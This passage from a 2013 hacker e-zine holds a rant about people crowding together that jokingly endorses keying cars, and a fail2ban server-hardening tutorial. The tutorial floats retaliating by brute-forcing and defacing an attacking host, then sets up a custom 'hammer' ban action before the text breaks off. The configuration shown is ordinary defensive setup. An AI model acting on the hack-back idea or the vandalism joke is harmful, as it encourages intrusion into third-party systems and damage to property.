read this article and smirked to yourself at least once.
Shamelessly to the good old days.
Brakis 2013
Please feel free to get in touch and add your own.
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
aritcles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Rambles and Rants - Social Herding by Briar |
+------------------------------------------------------------------------------+
Social herding even if you don't know the term I bet you've experienced the
sensation. You are in a cinema with maybe fifteen or so other people, therefore
there are plenty of other seats available but what happens when that next couple
arrive-they sit in your row but not just in your row, oh no, they sit a mere two
seats away from you! That my minions, is what I call social herding. All that
space and still they have to sit near you, even when you're giving off your
best 'I'm a psycho' vibe. Asshats!
What prompts this need to congregate I'm told is a in-built, neanderthalic need
to survive and how do we survive as a species? Superior numbers, good old group
living. This may indeed be the cause but it still pisses me off that these
individuals allow themselves to become nothing more than bipedal sheep by not
having the self awareness to sit somewhere bloody else!
Now, my temper would subside somewhat if I thought for a minute that the only
reason these woolly jumpers sat next to me was because I had nabbed the prime
viewing position and they were trying to muscle in but this is not the case. To
prove this to yourselves I suggest you go for a cinema visit in the near future
and choose the absolute worst viewing positions i.e down on the front row, right
in the middle and see just how many Dollies Baa their apologies as they squeeze
by you for a seat.
Obvisouly, for this experiment to work you'll have to choose a less than
exceptional film to see so that there are plenty of empty seats but given some
of the dross that's on, that shouldn't be too difficult.
This phenomena is not limited to the cinema, oh no, it haunts us elsewhere too.
Can you guess, yes indeedy, the car park conundrum.
Where, oh where, will I park? I know, I'll squeeze in right between that mini
and that campervan in my big SUV. And is it because there are no other spaces?
No, that's not it. The mini and the campervan are the only two cars in the
massive hundred car capacity carpark. Is it because I want to deter thieves?
(Although I've never seen the logic in that one, surely more cars just provide
the grand theft auto practitioner with good cover from the cameras??) Anyway,
that's not it either. Oh no, it's just that I don't want my SUV to be lonley-
cars after all are social creatures.
Yes, you got it baa baa black sheep has struck again. You are now totally within
your rights as a fully independent individual to key the feckers car!
I admit that perhaps this might not be viewed as a wholly constructive way to
deal with the social herding epidemic but what can I say sometimes a random act
of vandalism is the only way to go.
So, my minions the moral of this little rant is - watch it on fecking dvd!
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Proactive Server Defence |
+------------------------------------------------------------------------------+
It's always good to look through the good old server logs to see what cretin or
bot has tried to get into them. Actually it's a good source of getting access
to a compromised machine but that's another story.
Anyhow, after looking over reams and reams of failed log in attempts I figured,
hell, lets carry out some Google-fu and see what bell-end is attempting to gain
access to my k-rad-uber-proxy server. I mean lets face it, it's either a bot,
a government or some skid trying to be cool.
One day someone came along from IP address 213.248.110.43 and hammered the
SSH server to try and gain access, a quick google of the IP address reveals it's
a shared host, probably using one of the same passwords that it tried to gain
access to the proxy with.
So this makes us think, what could we do to prevent such skids attempting it
in the future. I mean there's a few options available but we must also look
at the situation. The possibilities are:
1) It was an automated bot, merely adding to the noise of the internet and my
machine was scanned along with thousands of others and it maybe got into
some.
2) It was a direct attack on our network by person or persons unknown.
3) There's nothing in the logs because someone gained access to the system and
cleaned up after themselves.
Situation 2 and 3 are the most worrying, even if it's most likely situation 1.
Now one could go through the logs and run a brute force on the system that
carried out the scan. Once in, all web pages could be defaced, scanning bots
removed, root password changed and server rebooted.
Yes, it would get noticed and cleaned up, a nice flashy colour clashing page
that screams beef up your security and stay the fuck away from my servers
might be all fun and good but it doesn't really solve the issues, except maybe
in the immediate short term. But it doesn't detract away that the host could
just have been set up as an attack server to gain access to others.
These attack servers crop up every now and then, and trying to get into them
in the same fashion that they tried will probably fail.
Then there's situation 3, what if they actually got into the server and you
never got to see the logs? They could be in there, backdoor the server and
leech all of your secret porn stash, even worse, what if they delete it?
Going over the logs is good, but if it only shows you who failed to get into
the machine, then going over it after the fact can be a little pointless.
My plan is to stop them in their tracks. We want to keep an eye open on
any attempt to brute force the server or scan it for exploits, not only do I
want to keep it out of my server(s) I want to prevent and hinder any other
attempts to get into any other system.
Ok, so in order to keep our systems secure we will deploy some software to watch
out for brute for attacks, in this case we will employ fail2ban which you can
download from http://www.fail2ban.org. This nifty bit of kit will monitor log
files for brute force attempts and block said offending IP addresses, it does
this in real time so you're not waiting on cron jobs to parse the logs.
It uses python and doesn't require any other dependencies, although it can
optionally use gamin.
Most distributions come with it these days, for example, while testing on the
pi it's just a case of:
sudo apt-get install fail2ban
Now it's installed lets mess with the settings and features so we can get
alittle nasty with intruders rather than just banning them.
First off we want to create a jail. The jails are basically a set of rules
that fail2ban looks for and what it does in reaction to those rules being
matched.
The most obvious and handiest of these is to add the IP address to IPtables
and get all packets from the offending IP address dropped. But we're evil
so we'll go a little further than that.
First step, copy the default jail file for editing:
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
Now we open the file for editing:
sudo nano /etc/fail2ban/jail.local
Ok head down to the section that is labled default, this is where you will
specify IPs that will be ignored. This can be the local IP addess, or if you
are on a static then you can set it here too. This is handy if you're a bit of
a numpty and forget your password more than a few times. If you have multiple
servers then you can add the IP of one in here and use said server to bounce
your connection to it if you need to.
You will also specify how long you want the offender banned for and how many
attempts to log in you will allow. Here is what we have:
[DEFAULT]
# "ignoreip" can be an IP address, a CIDR mask or a DNS host
ignoreip = 127.0.0.1/8
bantime = 18000
maxretry = 3
# "backend" specifies the backend used to get files modification. Available
# options are "gamin", "polling" and "auto".
# yoh: For some reason Debian shipped python-gamin didn't work as expected
# This issue left ToDo, so polling is default backend for now
backend = auto
#
# Destination email address used solely for the interpolations in
# jail.{conf,local} configuration files.
destemail = root@localhost.com
Ok, so we have the local IP address allowed, multiple addesses can be entered
and seperated with a space. It's always good to have an IP that you can log into
just in case, after all you won't want to set this one off once it's up and
running. We have set the ban time for 5 hours, this is a tad on the long side
I know, but I like to be sure; 10 minutes may be more than enough.
Maxretry speaks for itself, essentially how many retries you will allow for the
system to accept, 3 is generally the socially accepted standard. Although if you
are paranoid then you can set it to 1, possibly a few more if you wanted to be
certain it was a bot or whatnot.
Leave backend to auto and enter your email into the destemail to get a nice
mail everytime an IP address gets banned - assuming that you've set up a mail
server.
Now the next section we will look at in the /etc/fail2ban/jail.local file is
this part:
#
# ACTIONS
#
# Default banning action (e.g. iptables, iptables-new,
# iptables-multiport, shorewall, etc) It is used to define
# action_* variables. Can be overridden globally or per
# section within jail.local file
banaction = iptables-multiport
# email action. Since 0.8.1 upstream fail2ban uses sendmail
# MTA for the mailing. Change mta configuration parameter to mail
# if you want to revert to conventional 'mail'.
mta = sendmail
# Default protocol
protocol = tcp
[...]
Ok this default entry shows us what action will be called once the offender has
tried to brute force the server, the banaction = iptables-multiport is referring
to the file /etc/fail2ban/action.d/iptables-multiport.conf
We will change this to:
banaction = hammer
Now save it and we'll go make a few more changes to the set up, lets make a
copy of the action file and change a few things in there:
cd /etc/fail2ban/action.d
cp ./iptables-multiport.conf /etc/fail2ban/action.d/hammer.conf
nano /etc/fail2ban/action.d/hammer.conf
Now look for this bit:
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: IP address
# number of failures
#